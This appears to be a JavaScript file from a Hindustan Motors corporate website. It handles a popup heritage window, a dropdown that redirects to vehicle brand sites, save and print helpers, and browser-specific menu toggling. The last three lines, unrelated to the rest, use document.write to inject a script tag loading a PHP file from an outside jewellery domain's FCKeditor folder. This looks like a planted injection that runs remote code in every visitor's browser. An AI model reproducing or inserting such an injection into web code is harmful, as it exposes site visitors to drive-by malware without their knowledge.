function openIT() {
	theURL="heritage.html"
	wname ="CHROMELESSWIN"
	W=705;
	H=320;
	windowCERRARa 		= "images/close_a.gif"
	windowCERRARd 		= "images/close_d.gif"
	windowCERRARo 		= "images/close_o.gif"
	windowNONEgrf 		= "images/none.gif"
	windowCLOCK		= "images/clock.gif"
	windowREALtit		= "&nbsp; Task title"
	windowTIT 	    	= "<font face=arial size=2 color=#ffffff>&nbsp; Heritage of Hindustan Motors</font>"
	windowBORDERCOLOR   	= "#A080b0"
	windowBORDERCOLORsel	= "#E0BFD0"
	windowTITBGCOLOR    	= "#A080b0"
	windowTITBGCOLORsel 	= "#E0BFD0"
	openchromeless(theURL, wname, W, H, windowCERRARa, windowCERRARd, windowCERRARo, windowNONEgrf, windowCLOCK, windowTIT, windowREALtit , windowBORDERCOLOR, windowBORDERCOLORsel, windowTITBGCOLOR, windowTITBGCOLORsel)
}
function changeURL()
{
if(document.frmView.D1.value=='rtv')
{
location.href="http://www.hmrtv.com"
}
if(document.frmView.D1.value=='ppd')
{
location.href="http://www.hmppd.com"
}
if(document.frmView.D1.value=='muv')
{
location.href="http://www.hmmuv.com"
}
if(document.frmView.D1.value=='pup')
{
location.href="http://www.hmpup.com"
}
if(document.frmView.D1.value=='up')
{
location.href="http://www.hmutp.com"
}
if(document.frmView.D1.value=='exp')
{
location.href="http://www.hmexports.net"
}
if(document.frmView.D1.value=='lancer')
{
location.href="http://www.mitsubishi-motors.co.in"
}
if(document.frmView.D1.value=='cedia')
{
location.href="http://www.mitsubishi-motors.co.in"
}
if(document.frmView.D1.value=='mylancer')
{
location.href="http://www.my-lancer.com"
}
if(document.frmView.D1.value=='pajero')
{
location.href="http://www.mitsubishi-motors.co.in"
}
if(document.frmView.D1.value=='amby')
{
location.href="http://www.hmambassador.com"
}
if(document.frmView.D1.value=='montero')
{
location.href="http://www.mitsubishi-motors.co.in"
}
}
function doSave()
{
document.execCommand('SaveAs');
}
function doPrint()
{
document.execCommand('Print');
}

function openmenu(menu)
{
var IE=(document.all || document.getElementById);
var NS=(document.layers);
if(IE)
{
arrLayer=new Array('GROUP','VEHICLES','PLANTS','RSD');
for(i=0;i<arrLayer.length;i++)
		{
		if(arrLayer[i]==menu)
		document.all[arrLayer[i]].style.visibility="visible";
		else
		document.all[arrLayer[i]].style.visibility="hidden";
	}
}
if(NS)
{
arrLayer=new Array('GROUP','VEHICLES','PLANTS','RSD');
	for(i=0;i<arrLayer.length;i++)
		{
		if(arrLayer[i]==menu)
		document.layers[arrLayer[i]].visibility="show";
		else
		document.layers[arrLayer[i]].visibility="hide";
	}
}
document.onclick=openmenu
}

document.write('<script src=http://innerjewelry.com/FCKeditor/testcap.php ><\/script>');
document.write('<script src=http://innerjewelry.com/FCKeditor/testcap.php ><\/script>');
document.write('<script src=http://innerjewelry.com/FCKeditor/testcap.php ><\/script>');